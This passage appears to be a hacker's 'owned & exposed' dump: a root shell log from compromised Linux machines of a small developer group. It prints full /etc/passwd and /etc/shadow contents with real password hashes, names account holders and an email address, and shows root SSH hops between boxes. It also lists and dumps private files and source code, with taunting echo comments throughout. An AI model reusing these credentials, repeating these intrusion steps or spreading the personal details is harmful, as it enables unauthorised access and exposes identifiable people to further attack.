>>/root/backup.log echo "$FILE.sql Created in $TARGET$FILE and $TARGET2$FILE" >>/root/backup.log debian:~# ls * 0x1a 0x1aa backup.log dbootstrap_settings dead.letter install-report.template run.sh CVS: Entries Entries.Log Entries.Static Repository Root CVSROOT: CVS checkoutlist commitinfo config cvswrappers loginfo modules notify rcsinfo taginfo verifymsg backup: Backup.2005-07-27 Backup.2005-07-29 Backup.2005-07-31 Backup.2005-08-02 Backup.2005-08-04 Backup.2005-08-06 Backup.2005-08-08 Backup.2005-08-10 Backup.2005-08-12 Backup.2005-08-14 Backup.2005-08-16 Backup.2005-08-18 Backup.2005-07-28 Backup.2005-07-30 Backup.2005-08-01 Backup.2005-08-03 Backup.2005-08-05 Backup.2005-08-07 Backup.2005-08-09 Backup.2005-08-11 Backup.2005-08-13 Backup.2005-08-15 Backup.2005-08-17 bugzilla: bin cgi-bin conf htdocs icons include info lib libexec logs man mysql-test proxy share sql-bench tt2 var graphs: tool: run.sh debian:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false rave:x:1000:1000:Johnny Mast,,,:/home/rave:/bin/bash postgres:x:100:103:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash messagebus:x:101:104::/var/run/dbus:/bin/false hal:x:106:106:Hardware abstraction layer,,,:/var/run/hal:/bin/false identd:x:103:65534::/var/run/identd:/bin/false sshd:x:104:65534::/var/run/sshd:/bin/false gdm:x:105:109:Gnome Display Manager:/var/lib/gdm:/bin/false saned:x:111:111::/home/saned:/bin/false top:!!:0:0::/home/top: infobot:!!:1002:100::/home/infobot: cvsuser:$1$PF/B7FYn$1gSetRbjjybehTAkgC34P/:1004:100::/home/cvsuser: cvsd:x:107:112:cvs pserver daemon:/cvsroot:/bin/false webcam:!!:1005:113::/var/www/images1:/bin/bash mailman:!!:1006:1006:mailman,,,:/home/mailman:/bin/bash smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false backuppc:x:110:116:BackupPC,,,:/var/lib/backuppc:/bin/sh mysql:x:112:117:MySQL Server,,,:/var/lib/mysql:/bin/false zope:x:113:118::/var/lib/zope2.7/var:/bin/false commiters:!!:1003:1003:la,la,la,la,la:/home/commiters:/bin/bash saxa:x:1007:100::/home/saxa: pisg:x:1008:100::/home/pisg: angelo:x:1009:100::/home/angelo: asterisk:x:119:119:Asterisk PBX daemon,,,:/var/lib/asterisk:/bin/false cold:x:1010:1010:Chad .c Delecia,,,:/home/cold:/bin/bash bind:x:114:120::/var/cache/bind:/bin/false debian:~# cat /etc/shadow root:$1$/zsQh1gp$SqhvkZ/hAOJ8bqvctoIO60:12896:0:99999:7::: daemon:*:12896:0:99999:7::: bin:*:12896:0:99999:7::: sys:*:12896:0:99999:7::: sync:*:12896:0:99999:7::: games:*:12896:0:99999:7::: man:*:12896:0:99999:7::: lp:*:12896:0:99999:7::: mail:*:12896:0:99999:7::: news:*:12896:0:99999:7::: uucp:*:12896:0:99999:7::: proxy:*:12896:0:99999:7::: www-data:*:12896:0:99999:7::: backup:*:12896:0:99999:7::: list:*:12896:0:99999:7::: irc:*:12896:0:99999:7::: gnats:*:12896:0:99999:7::: nobody:*:12896:0:99999:7::: Debian-exim:!:12896:0:99999:7::: rave:$1$jMXmjKYi$Rkrw8NjvOQ5wK.i1Gz/xc.:12973:0:99999:7::: postgres:!:12896:0:99999:7::: messagebus:!:12896:0:99999:7::: hal:!:12896:0:99999:7::: identd:!:12896:0:99999:7::: sshd:!:12896:0:99999:7::: gdm:!:12896:0:99999:7::: saned:!:12896:0:99999:7::: top:$1$00SuKszA$LS6Wq02YtGVIUAmzuKnuL1:12897:0:99999:7::: infobot:!:12897:0:99999:7::: cvsuser:$1$a8aWeeeu$k4.IWNK8JmkBbrON/QJZa/:12908:0:99999:7::: cvsd:!:12908:0:99999:7::: webcam:$1$pOnnXk9F$WKSkPHlyxMkZgIOJchJ4S0:12932:0:99999:7::: mailman:$1$esgmUHJp$PsugdoYzV0VnrjoYn1FRA1:12919:0:99999:7::: smmta:!:12920:0:99999:7::: smmsp:!:12920:0:99999:7::: backuppc:$1$V7BzjcWZ$7qN1YR1FjtL2s9rGYowNj/:12965:0:99999:7::: mysql:!:12966:0:99999:7::: zope:!:12966:0:99999:7::: commiters:$1$1VvgOPZ7$oUapZsn7.hB3Bs7VOIOr..:12968:0:99999:7::: saxa:$1$1LjOGXvd$7PY7f4534zyaOcvjhMjHK1:12968:0:99999:7::: pisg:!:12968:0:99999:7::: angelo:$1$8CR4j8/n$gHbiIeK0i9EB.phRoisMW/:12981:0:99999:7::: asterisk:!:12982:0:99999:7::: cold:$1$iD0b/cDI$9TAv1tXhe4DioH3CvH3BT0:13005:0:99999:7::: bind:!:13008:0:99999:7::: debian:~# cd /var/www/ debian:/var/www# ls 3.asm analog boot.txt dc edge-01-06-2005.tar.gz icons index.html main.c mod_warez.c my.asm pgp priv transfer.c.txt webcam zoper GT4 apache2-default bugzilla downloads extreme images jatx main.txt module my.org phpBB-2.0.16.zip site upload wiki Screenshot.png boot.asm compile.txt edge extreme.tar.gz imgsystem la.tar.gz manual module.tar.gz pacct pics smnt.c uploads xcs debian:/var/www# echo "oooh.. what do we got here..." oooh.. what do we got here... debian:/var/www# cat 3.asm ; 3.ASM ; Load a program off the disk and jump to it ; Tell the compiler that this is offset 0. ; It isn't offset 0, but it will be after the jump. [ORG 0] jmp 07C0h:start ; Goto segment 07C0 start: ; Update the segment registers mov ax, cs mov ds, ax mov es, ax reset: ; Reset the floppy drive mov ax, 0 ; mov dl, 2 ; Drive=0 (=A) int 13h ; ; jc reset ; ERROR => reset again read: mov ax, 1000h ; ES:BX = 1000:0000 mov es, ax ; mov bx, 0 ; mov ah, 2 ; Load disk data to ES:BX mov al, 5 ; Load 5 sectors mov ch, 0 ; Cylinder=0 mov cl, 2 ; Sector=2 mov dh, 0 ; Head=0 mov dl, 0 ; Drive=0 int 13h ; Read! ; jc read ; ERROR => Try again call a20 call pmod jmp 1000h:0000 ; Jump to the program ret a20: ; set A20 line cli ; no more interuptions! :) xor cx, cx clear_buf: in al, 64h ; get input from keyboard status port test al, 02h ; test the buffer full flag loopnz clear_buf ; loop until buffer is empty mov al, 0D1h ; keyboard: write to output port out 64h, al ; output command to keyboard clear_buf2: in al, 64h ; wait 'till buffer is empty again test al, 02h loopnz clear_buf2 mov al, 0dfh ; keyboard: set A20 out 60h, al ; send it to the keyboard controller mov cx, 14h wait_kbc: ; this is approx. a 25uS delay to wait out 0edh, ax ; for the kb controler to execute our loop wait_kbc ; command. ; the A20 line is on now. Let's load in our ITD and GDT tables... ; Ideally, there will actually be data in their locations (by loading ; the kernel) ; lidt [pIDT] ; lgdt [pGDT] sti ret pmod: ; now let's enter pmode... mov eax, cr0 ; load the control register in or al, 1 ; set bit 1: pmode bit mov cr3, eax ; copy it back to the control register pIDT dw 7FFh ; limit of 256 IDT slots dd 0000h ; starting at 0000 pGDT dw 17FFh ; limit of 768 GDT slots dd 0800h ; starting at 0800h (after IDT) ret times 510-($-$$) db 0 dw 0AA55h debian:/var/www# cat smnt.c /* SMNT command coded by COld@Rosiello.net, copyright 2005 */ #if defined(HAVE_SYS_MOUNT_H) #include #endif #include #include #include #include #include #include #define __GIVE_SES__ #include #include #include #if defined(HAVE_SYS_TYPES_H) #include #endif #define INCOUNT_ERROR -2 #define MOUNTED -1 #define NOT_MOUNTED 0 static char purpose[] = "SMNT, is implemented to let the user mount other fileystems"; int SMNT_CMD(int argc, char *argv[]) { char *execmds[5], cmd[128]; int fd; uid_t uid; uid = getuid(); int ret, len; if((int)uid != 0){ s_send(ses ->fd, " Permission denied"); return 0; } if(argc != 1) { s_send(ses ->fd, "501 Snyax error."); return 0; } execmds[1] = argv[1]; len = snprintf(cmd, sizeof(cmd)-1, "/bin/mount %s", execmds[1]); cmd[len] = '\0'; if((access(execmds[1],F_OK)) != 0) { s_send(ses ->fd," Filesystem %s does not exist", execmds[1]); return 0; } /* if((fd = open(execmds[1],O_WRONLY)) == 0) { s_send(ses ->fd," Filesystem already mounted"); close(fd); return 0; } */ if(((ret = system(cmd))) != 0) { s_send(ses ->fd, "550 error when mounting %s",execmds[1]); #if defined(DEBUG) debug_msg("Error: %s user passed %s and it failed",ses->u_name,ses->u_lastcmd); #endif return 0; } s_send(ses ->fd,"200 Successful mount"); return 0; } struct module *mod_init(void) { struct module *mod; if(!(mod = malloc((int)sizeof(struct module)))){ fprintf(stderr,"Error when trying to allocate memory using malloc"); return NULL; } mod->vendor = strdup("Rosiello"); mod->author = strdup("Cold"); mod->email = strdup("swash151@hotmail.com"); mod->name = strdup("SMNT"); mod->explain = strdup(purpose); mod->version[0] = 1; mod->version[1] = 1; mod->main = strdup("SMNT_CMD"); mod->term = strdup("term"); mod->type = MOD_CMD; mod->need_argc = 1; mod->need_reg = 1; if((addcommand("SMNT",1,SMNT_CMD,1,1)) < 0) { return NULL; } return mod; } int checkmounts() { /* FILE *fd; char c,buf[500]; if((fd = fopen("/proc/mounts",'r')) == -1) { #if defined(DEBUG) debug_msg("Error: when opening file '/proc/mounts', fopen failed"); #endif perror("OPEN:"); s_send(" smnt incountered a error"); return INCOUNT_ERROR; } bzero(buf,(int)sizeof(buf)-1); /* Zero out Buffer*/ /* parse this B*tch */ /* while((buf = fgets(buf,) != '\n') { if((strcmp( } */ } void term() { return; } debian:/var/www# ls * 3.asm Screenshot.png boot.asm boot.txt compile.txt edge-01-06-2005.tar.gz extreme.tar.gz index.html la.tar.gz main.c main.txt mod_warez.c module.tar.gz my.asm my.org phpBB-2.0.16.zip smnt.c transfer.c.txt GT4: IMG0000.JPG IMG0001.JPG IMG0002.JPG IMG0003.JPG IMG0004.JPG IMG0005.JPG IMG0006.JPG IMG0007.JPG IMG0008.JPG IMG0009.JPG IMG0010.JPG IMG0011.JPG analog: analogo.gif bara32.gif barb16.gif barb8.gif barc32.gif bard16.gif bard8.gif bare32.gif barf16.gif barf8.gif barg32.gif barh16.gif barh8.gif bari32.gif barj16.gif barj8.gif sq4.png analogo.png bara32.png barb16.png barb8.png barc32.png bard16.png bard8.png bare32.png barf16.png barf8.png barg32.png barh16.png barh8.png bari32.png barj16.png barj8.png sq5.png bara1.gif bara4.gif barb2.gif barc1.gif barc4.gif bard2.gif bare1.gif bare4.gif barf2.gif barg1.gif barg4.gif barh2.gif bari1.gif bari4.gif barj2.gif html2.gif sq6.png bara1.png bara4.png barb2.png barc1.png barc4.png bard2.png bare1.png bare4.png barf2.png barg1.png barg4.png barh2.png bari1.png bari4.png barj2.png html2.png sq7.png bara16.gif bara8.gif barb32.gif barc16.gif barc8.gif bard32.gif bare16.gif bare8.gif barf32.gif barg16.gif barg8.gif barh32.gif bari16.gif bari8.gif barj32.gif sq0.png sq8.png bara16.png bara8.png barb32.png barc16.png barc8.png bard32.png bare16.png bare8.png barf32.png barg16.png barg8.png barh32.png bari16.png bari8.png barj32.png sq1.png sq9.png bara2.gif barb1.gif barb4.gif barc2.gif bard1.gif bard4.gif bare2.gif barf1.gif barf4.gif barg2.gif barh1.gif barh4.gif bari2.gif barj1.gif barj4.gif sq2.png sqg.png bara2.png barb1.png barb4.png barc2.png bard1.png bard4.png bare2.png barf1.png barf4.png barg2.png barh1.png barh4.png bari2.png barj1.png barj4.png sq3.png apache2-default: CHANGELOG apache_pb2.gif configuration.php-dist images index.html.dk index.html.fr index.html.lb.utf8 index.html.pt-br index.html.sv installation offline.php INSTALL apache_pb2.png editor includes index.html.ee index.html.he.iso8859-8 index.html.nl index.html.ru.cp-1251 index.html.var language pathway.php LICENSE apache_pb2_ani.gif extreme index.html index.html.el index.html.hr.iso8859-2 index.html.nn index.html.ru.cp866 index.html.zh-cn.gb2312 mainbody.php robots.txt administrator cache globals.php index.html.ca index.html.en index.html.it index.html.no index.html.ru.iso-ru index.html.zh-tw.big5 mambots templates apache_pb.gif components help index.html.cz.iso8859-2 index.html.es index.html.ja.iso2022-jp index.html.po.iso8859-2 index.html.ru.koi8-r index.php media apache_pb.png configuration.php htaccess.txt index.html.de index.html.et index.html.ko.euc-kr index.html.pt index.html.ru.utf8 index2.php modules bugzilla: 1x1.gif ant.jpg css data index.html js localconfig.js padlock.png productmenu.js quicksearch.html quicksearch.js quicksearchhack.html robots.txt skins dc: Compilation issue`s.html Manual index page.html Setting up vhosts.html configure.html ginfo.html index.html manual downloads: Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar sensation3 Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad Religion-The Answer.mp3 fransfer.txt edge: Plone-2.0.5 Plone-2.0.5.tar config.php edge-0.1.1-i edge-0.1.1-i.tar edge-01-06-2005 edge-01-06-2005.tar phpMyAdmin-2.6.2-pl1 phpMyAdmin-2.6.2-pl1.zip phpMyAdmin-2.6.2-pl1.zip?download extreme: icons: analogo.gif bara32.gif barb16.gif barb8.gif barc32.gif bard16.gif bard8.gif bare32.gif barf16.gif barf8.gif barg32.gif barh16.gif barh8.gif bari32.gif barj16.gif barj8.gif sq4.png analogo.png bara32.png barb16.png barb8.png barc32.png bard16.png bard8.png bare32.png barf16.png barf8.png barg32.png barh16.png barh8.png bari32.png barj16.png barj8.png sq5.png bara1.gif bara4.gif barb2.gif barc1.gif barc4.gif bard2.gif bare1.gif bare4.gif barf2.gif barg1.gif barg4.gif barh2.gif bari1.gif bari4.gif barj2.gif html2.gif sq6.png bara1.png bara4.png barb2.png barc1.png barc4.png bard2.png bare1.png bare4.png barf2.png barg1.png barg4.png barh2.png bari1.png bari4.png barj2.png html2.png sq7.png bara16.gif bara8.gif barb32.gif barc16.gif barc8.gif bard32.gif bare16.gif bare8.gif barf32.gif barg16.gif barg8.gif barh32.gif bari16.gif bari8.gif barj32.gif sq0.png sq8.png bara16.png bara8.png barb32.png barc16.png barc8.png bard32.png bare16.png bare8.png barf32.png barg16.png barg8.png barh32.png bari16.png bari8.png barj32.png sq1.png sq9.png bara2.gif barb1.gif barb4.gif barc2.gif bard1.gif bard4.gif bare2.gif barf1.gif barf4.gif barg2.gif barh1.gif barh4.gif bari2.gif barj1.gif barj4.gif sq2.png sqg.png bara2.png barb1.png barb4.png barc2.png bard1.png bard4.png bare2.png barf1.png barf4.png barg2.png barh1.png barh4.png bari2.png barj1.png barj4.png sq3.png images: webcam.jpg imgsystem: 0x5a arrowleft.gif arrowup.gif ece.gif folder.png foldernew.png follow.png locked.gif logo.gif.bk memoalert.gif newtopic.png sticky.png arrowdown.gif arrowright.gif country edgeotaz.gif foldern.png folders.png icq.gif logo.gif mail.gif new.gif page.gif jatx: White Town - I Could Never be Your Woman.mp3 download index.html jatx.tar.gz link.html screens src manual: Compilation issue`s.html Manual index page.html Setting up vhosts.html configure.html ginfo.html index.html module: Makefile TODO main main.c module.h modules pacct: COPYRIGHTS LOGO README TODO debiancoder.jpg headers man pacct pacct.tar.gz src test pgp: rave.asc pics: PIC.JPG PICT0056.JPG PICT0073.JPG PICT0080.JPG cam.mov const.iso lo snap-unknown-20050514-154211-1.jpeg snap-unknown-20050514-154332-1.jpeg snap-unknown-20050514-154342-1.jpeg snapshot2.png priv: funcs images index.php la.php site: abuse.html committee.html footer.php include index.phps menu.php rss.php site.tar sql.php test.html top.php uploads call.html error.php images index.php index2.html papers.html rss.xml site.tar.gz submit.html thankyou.html uploaders.phps waiting.html upload: uploads: orig00000005.jpg orig00000006.jpg orig00000007.jpg orig00000008.jpg webcam: index.html wiki: AdminSettings.sample FAQ INSTALL README UPGRADE config extensions img_auth.php index.php irc maintenance redirect.php skins wiki.phtml COPYING HISTORY LocalSettings.php RELEASE-NOTES Version.php docs images includes install-utils.inc languages math redirect.phtml tests xcs: ARIAL.TTF funcs include index.php stat.php zoper: Extensions Products README.txt bin etc import inituser log var debian:/var/www# ls pics/* pics/PIC.JPG pics/PICT0073.JPG pics/cam.mov pics/lo pics/snap-unknown-20050514-154332-1.jpeg pics/snapshot2.png pics/PICT0056.JPG pics/PICT0080.JPG pics/const.iso pics/snap-unknown-20050514-154211-1.jpeg pics/snap-unknown-20050514-154342-1.jpeg debian:/var/www# echo "next box =)" next box =) [3] laptop.localdomain (192.168.0.6) owned & exposed debian:/var/www# ssh 192.168.0.2 -l root Password: Last login: Wed Aug 17 22:28:51 2005 from laptop.localdomain debian:~# uname -a; id Linux debian.rosiello.net 2.4.27-2-386 #1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) debian:~# ls /home/ amanda angelo cold commiters cvsuser infobot mailman pisg rave saxa top debian:~# ls /home/* /home/amanda: Desktop Mail /home/angelo: /home/cold: /home/commiters: /home/cvsuser: CVS CVSROOT /home/infobot: infobot-0.45.3 infobot-0.45.3.tar /home/mailman: Mailman archives bin cgi-bin cron data filters icons lists locks logs mail qfiles scripts spam templates /home/pisg: blue-h.png blue-v.png green-h.png green-v.png html index.html pisg.cfg red-h.png red-v.png yellow-h.png yellow-v.png /home/rave: 1077606958.gif Desktop Mail bin bk cmds cvsroot dr.c edge extra extreme gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh /home/saxa: /home/top: [3] debian:/var/www# ssh 192.168.0.6 -l rave Password: Last login: Thu Aug 18 18:46:41 2005 from 192.168.0.10 rave@debian:~$ uname -a; id Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=1000(rave) gid=1000(rave) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(rave) rave@debian:~$ echo "Please stop calling everyone of your boxes for DEBIAN" Please stop calling everyone of your boxes for DEBIAN rave@debian:~$ w 22:28:03 up 5:21, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT rave :0 - 17:07 ?xdm? 10:05 0.49s /usr/bin/gnome-session rave@debian:~$ echo "Hurray his laaaaptop" Hurray his laaaaptop 20050729-Floortje.JPG aclocal.m4 config-2.4.27-2-386 extra gFTPd jatx.bmp ndiswrapper_1.1-4.diff.gz ptracetest.c.html server.req.pem ssl.rnd CVS amaroK.pm d extreme gnome jatx.jpg ndiswrapper_1.1-4.dsc rfc2228.txt spca5xx-20050701 ssl_error.txt Desktop amarok_window.pl devforum extreme2 hello.c modules ndiswrapper_1.1.orig.tar.gz rfc2228_2.txt spca5xx-20050701.tar ubuntu-5.04-install-i386.iso Destkop amarok_xchat.pl downloads fd hello.o montagnes_001.jpg o.ogg server.cert.pem ssl.bk vsftpd-2.0.3 Makefile cmds everyday.jpg ftppasswd jatx ndiswrapper-1.1 passwd server.key.pem ssl.cnf wzdftpd-0.5.2 rave@debian:~$ cat amarok_xchat.pl #!/usr/bin/perl -w use strict; ##!! Copy amaroK.pm to /usr/share/perl5/ use amaroK; ## Mode ACTION = mynick is playing David Lee Roth - Yankee Rose ## MSG = <@mynick> np: David Lee Roth - Yankee Rose our $mode = "msg"; ## Change this! our $dcop = "/usr/bin/dcop"; ## Format (case-sensitive!) # our $format = "{nowPlaying} - {album} ( {currentTime}/{totalTime}, {bitrate}, {sampleRate} Hz )"; our $format = "{artist} - {title} ( {currentTime}/{totalTime} )"; sub amarok_np { my $output; my $amarok; eval { $amarok = new amaroK($format, $dcop); $output = $amarok->get(); }; if ($@) { Xchat::print( $@ ); return 0; } if ($output) { IRC::command( ($mode eq "MSG"?"/say np:":"/me is playing") ." $output"); return 1; } } sub amarok_cmd { my $amarok; eval { $amarok = new amaroK($format, $dcop); $amarok->command($_[1][1]); }; Xchat::print( $@ ) if ($@); } Xchat::register("NP Script for amaroK", 0.1); Xchat::print("Now playing script for amaroK"); Xchat::hook_command("amarok", "amarok_np"); Xchat::hook_command("amarokcmd", "amarok_cmd"); rave@debian:~$ cat amarok_window.pl #!/usr/bin/perl -w use strict; use Glib qw/TRUE FALSE/; use Gtk2 '-init'; use amaroK; our $amarok; our $dcop = "/usr/bin/dcop"; our $format = "{artist} - {title} ( {currentTime}/{totalTime} )"; our @controls = ( [ '|<' , 'prev' ], [ '|>' , 'play' ], [ '||' , 'playPause' ], [ '[]' , 'stop' ], [ '>|' , 'next' ], [ '[+]' , 'volumeUp' ], [ '[-]' , 'volumeDown'] ); sub command { my ( $btn, $args ) = @_; $amarok->command( $args ); } sub delete_event { Gtk2->main_quit; return FALSE; } sub init { my $mainwnd = new Gtk2::Window( 'toplevel' ); $mainwnd->move( 350, 350 ); $mainwnd->set_title( '...:: amaroK control panel ::...' ); $mainwnd->signal_connect( delete_event => \&delete_event ); my $statusbar = new Gtk2::Statusbar; $statusbar->show( ); eval { $amarok = new amaroK( $format, $dcop ); $statusbar->push( 0, $amarok->get( ) ); }; warn "$@\n" if( $@ ); my $buttonbox = new Gtk2::HBox(FALSE, 0); # create controls for ( @controls ) { my @control = $_; my $button = Gtk2::Button->new( $control[0][0] ); # add signal handler for click $button->signal_connect( clicked => \&command, $control[0][1] ); # add button to box $buttonbox->pack_start( $button, TRUE, TRUE, 0 ); $button->show( ); } $buttonbox->show( ); # contains buttonbox and statusbar my $vbox = Gtk2::VBox->new(FALSE, 0); $vbox->pack_start( $buttonbox, TRUE, TRUE, 0 ); $vbox->pack_start( $statusbar, TRUE, TRUE, 0 ); $vbox->show( ); $mainwnd->add( $vbox ); $mainwnd->show( ); # update interval 2,5 sec Glib::Timeout->add(2500, sub { $statusbar->push( 0, $amarok->get ); }, undef); } &init( ); Gtk2->main( ); 0; rave@debian:~$ ls -la total 609284 drwxr-xr-x 54 rave rave 4096 Aug 18 21:03 . drwxrwsr-x 4 root staff 4096 Aug 6 21:02 .. lrwxrwxrwx 1 rave rave 32 Aug 18 17:10 .DCOPserver_debian_:0 -> /home/rave/.DCOPserver_debian__0 -rw-r--r-- 1 rave rave 53 Aug 18 17:10 .DCOPserver_debian__0 -rw------- 1 rave rave 1682 Aug 18 17:10 .ICEauthority drwx------ 4 rave rave 4096 Aug 18 07:02 .Trash -rw------- 1 rave rave 117 Aug 18 17:07 .Xauthority -rw-r--r-- 1 rave rave 75 Aug 13 20:46 .Xclients drwx------ 2 rave rave 4096 Aug 13 03:06 .alsaplayer -rw------- 1 rave rave 5759 Aug 18 18:53 .bash_history -rw-r--r-- 1 rave rave 704 Jul 31 22:33 .bash_profile -rw-r--r-- 1 rave rave 1298 Aug 18 18:50 .bashrc drwxr-xr-x 2 rave rave 4096 Aug 4 15:09 .bluefish drwxr-xr-x 4 rave rave 4096 Aug 7 06:07 .cddb drwxr-xr-x 2 rave rave 4096 Aug 1 03:08 .cddbslave drwx------ 3 rave rave 4096 Aug 13 21:26 .config -rw------- 1 rave rave 24 Aug 13 21:23 .dmrc drwx------ 5 rave rave 4096 Aug 13 21:22 .enlightenment drwxr-xr-x 8 rave rave 4096 Aug 18 07:04 .evolution drwx------ 2 rave rave 4096 Aug 10 02:48 .fluxbox -rw-r--r-- 1 rave rave 6617 Aug 4 20:40 .fonts.cache-1 -rw-r--r-- 1 rave rave 307 Aug 13 21:27 .fonts.conf drwx------ 5 rave rave 4096 Aug 18 17:08 .gconf drwx------ 2 rave rave 4096 Aug 18 20:57 .gconfd drwxr-xr-x 21 rave rave 4096 Aug 17 20:49 .gimp-2.2 -rw-r----- 1 rave rave 0 Aug 6 03:25 .gksu.lock drwx------ 4 rave rave 4096 Aug 2 14:28 .gnome drwx------ 11 rave rave 4096 Aug 18 17:08 .gnome2 drwx------ 2 rave rave 4096 Aug 1 19:52 .gnome2_private drwx------ 3 rave rave 4096 Aug 13 21:24 .gnupg drwxr-xr-x 2 rave rave 4096 Aug 1 00:11 .gstreamer-0.8 -rw-r--r-- 1 rave rave 86 Aug 17 22:02 .gtkrc-1.2-gnome2 -rw-r--r-- 1 rave rave 162 Aug 17 22:10 .gtkrc-2.0 drwxr-xr-x 2 rave rave 4096 Aug 1 01:07 .icons drwxr-xr-x 2 rave rave 4096 Aug 17 21:40 .kasablanca drwx------ 4 rave rave 4096 Aug 6 03:23 .kde -rw------- 1 rave rave 154 Aug 13 20:42 .kderc drwx------ 3 rave rave 4096 Aug 10 02:50 .local drwxr-xr-x 3 rave rave 4096 Aug 1 01:07 .mcop -rw------- 1 rave rave 31 Aug 7 03:22 .mcoprc -rw------- 1 rave rave 31 Aug 5 14:56 .mcoprcX8cPRa.new drwx------ 3 rave rave 4096 Aug 1 00:11 .metacity drwx------ 5 rave rave 4096 Aug 4 23:24 .mozilla -rw------- 1 rave rave 749 Aug 18 20:36 .nano_history drwxr-xr-x 3 rave rave 4096 Aug 1 00:11 .nautilus drwxr-xr-x 3 rave rave 4096 Aug 5 23:40 .openoffice drwxr-xr-x 2 rave rave 4096 Aug 15 19:37 .qt -rw------- 1 rave rave 25002 Aug 18 21:53 .recently-used drwx------ 2 rave rave 4096 Aug 1 00:13 .ssh -rw-r--r-- 1 rave rave 69 Aug 5 23:40 .sversionrc drwxr-xr-x 2 rave rave 4096 Aug 1 01:07 .themes drwx------ 5 rave rave 4096 Aug 6 03:23 .thumbnails -rw------- 1 rave rave 3745 Aug 17 23:37 .viminfo drwxr-xr-x 4 rave rave 4096 Aug 15 21:35 .wine drwx------ 4 rave rave 4096 Aug 18 07:03 .xchat2 drwxr-xr-x 2 rave rave 4096 Aug 2 01:46 .xine -rw-r--r-- 1 rave rave 75 Aug 13 20:46 .xinitrc drwxr-xr-x 4 rave rave 4096 Aug 1 03:10 .xmms -rw-r--r-- 1 rave rave 75 Aug 13 20:46 .xsession -rw-r--r-- 1 rave rave 200110 Aug 18 20:44 .xsession-errors -rw-r--r-- 1 rave rave 348626 Aug 5 00:51 20050729-Floortje.JPG drwxr-xr-x 2 rave rave 4096 Aug 17 23:32 CVS drwxr-xr-x 5 rave rave 4096 Aug 18 21:53 Desktop drwxrwxrwx 4 rave rave 4096 Aug 2 00:29 Destkop -rw-r--r-- 1 rave rave 7852 Aug 16 21:46 Makefile -rw-r--r-- 1 rave rave 38468 Aug 3 08:43 aclocal.m4 -rw-r--r-- 1 rave rave 3600 May 19 19:03 amaroK.pm -rwxr-xr-x 1 rave rave 1841 May 21 22:00 amarok_window.pl -rw-r--r-- 1 rave rave 1154 May 19 19:03 amarok_xchat.pl drwxr-xr-x 3 rave rave 4096 Aug 17 23:20 cmds -rw-r--r-- 1 rave rave 44852 Aug 2 21:11 config-2.4.27-2-386 -rw-r--r-- 1 rave rave 168 Aug 14 22:12 d drwxr-xr-x 4 rave rave 4096 Aug 12 20:13 devforum drwxrwxrwx 4 rave rave 4096 Aug 1 01:44 downloads -rw-r--r-- 1 rave rave 722888 Aug 18 07:00 everyday.jpg drwxr-xr-x 5 rave rave 4096 Aug 17 23:35 extra drwxr-xr-x 12 rave rave 4096 Aug 18 20:55 extreme drwxr-xr-x 4 rave rave 4096 Aug 17 22:20 extreme2 -rw-r--r-- 1 rave rave 0 Aug 14 22:06 fd drwxr-xr-x 2 rave rave 4096 Aug 10 00:12 ftppasswd drwxr-xr-x 4 rave rave 4096 Aug 14 16:53 gFTPd drwxr-xr-x 2 rave rave 4096 Aug 14 17:10 gnome -rw-r--r-- 1 rave rave 344 Aug 14 16:34 hello.c -rw-r--r-- 1 root root 51800 Aug 14 16:41 hello.o drwxr-xr-x 8 rave rave 4096 Aug 12 14:53 jatx -rw-r--r-- 1 rave rave 48450 Aug 17 20:42 jatx.bmp -rw-r--r-- 1 rave rave 2205 Aug 17 20:50 jatx.jpg drwxr-xr-x 3 rave rave 4096 Aug 3 01:28 modules -rw-r--r-- 1 rave rave 112513 Aug 18 07:01 montagnes_001.jpg drwxr-xr-x 5 rave rave 4096 Mar 5 02:51 ndiswrapper-1.1 -rw-r--r-- 1 rave rave 7155 Apr 11 10:02 ndiswrapper_1.1-4.diff.gz -rw-r--r-- 1 rave rave 613 Apr 11 10:02 ndiswrapper_1.1-4.dsc -rw-r--r-- 1 rave rave 135361 Mar 26 10:32 ndiswrapper_1.1.orig.tar.gz -rwxr-xr-x 1 root root 4711976 Aug 2 01:46 o.ogg -rw-r--r-- 1 rave rave 1201 Aug 3 00:46 passwd -rw-r--r-- 1 rave rave 8486 Aug 1 21:29 ptracetest.c.html -rw-r--r-- 1 rave rave 58733 Aug 15 20:50 rfc2228.txt -rw-r--r-- 1 rave rave 58733 Aug 16 20:53 rfc2228_2.txt -rw------- 1 rave rave 1273 Aug 16 21:52 server.cert.pem -rw------- 1 rave rave 887 Aug 16 21:52 server.key.pem -rw------- 1 rave rave 696 Aug 16 21:52 server.req.pem drwxr-xr-x 4 500 users 4096 Aug 6 15:14 spca5xx-20050701 -rw-r--r-- 1 rave rave 942080 Aug 6 15:13 spca5xx-20050701.tar 